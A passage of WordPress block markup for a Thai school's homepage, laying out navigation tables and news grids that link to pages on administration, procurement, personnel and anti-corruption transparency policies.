data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span 